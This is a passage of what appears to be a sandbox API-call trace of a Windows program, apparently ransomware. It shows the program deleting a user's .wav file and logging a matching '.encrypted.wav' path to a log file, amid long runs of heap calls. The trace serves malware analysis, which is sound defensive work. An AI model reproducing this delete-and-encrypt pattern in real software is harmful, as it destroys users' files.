lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0038.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0038.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0038.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0038.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0038.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0038.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0038.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.472] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0038.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.472] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.472] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.472] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0038.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.473] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.473] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.473] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav", lpFilePart=0x0) returned 0x3b [0038.473] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x939c98a0, ftCreationTime.dwHighDateTime=0x1d5c1c1, ftLastAccessTime.dwLowDateTime=0xb4f60e50, ftLastAccessTime.dwHighDateTime=0x1d5bae1, ftLastWriteTime.dwLowDateTime=0x16a30340, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x10944, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="SG2JCe2OU9yef2QQFr-.wav", cAlternateFileName="SG2JCE~1.WAV")) returned 0x7c2100 [0038.473] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sg2jce2ou9yef2qqfr-.wav")) returned 1 [0038.474] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x939c98a0, ftCreationTime.dwHighDateTime=0x1d5c1c1, ftLastAccessTime.dwLowDateTime=0xb4f60e50, ftLastAccessTime.dwHighDateTime=0x1d5bae1, ftLastWriteTime.dwLowDateTime=0x16a30340, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x10944, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="SG2JCe2OU9yef2QQFr-.wav", cAlternateFileName="SG2JCE~1.WAV")) returned 0 [0038.474] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0038.474] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.474] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0038.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0038.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0038.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0038.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0038.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.475] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.475] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0038.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.475] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.475] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0038.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0038.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.475] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0038.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.476] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0038.476] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.476] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.476] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0038.476] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.476] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.476] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0038.476] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x25a1, lpOverlapped=0x0) returned 1 [0038.477] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0038.477] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x25a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.477] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0038.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0038.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.encrypted.wav\r\n", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0038.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x48) returned 0x88e138 [0038.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.encrypted.wav\r\n", cchWideChar=72, lpMultiByteStr=0x88e138, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.encrypted.wav\r\n", lpUsedDefaultChar=0x0) returned 72 [0038.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0038.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0038.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0038.477] WriteFile (in: hFile=0x140, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, lpNumberOfBytesWritten=0x6aee3c*=0x47, lpOverlapped=0x0) returned 1 [0038.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0038.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.478] CloseHandle (hObject=0x140) returned 1 [0038.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0038.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0038.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0038.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0038.479] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0038.480] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0038.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.481] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0038.481] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.481] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0038.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0038.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.481] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0038.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af368 [0038.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0038.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0038.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0038.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0038.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0038.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a60 [0038.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0038.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0038.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0038.481] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0038.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0038.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0038.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0038.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0038.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0038.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0038.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.483] HeapFree 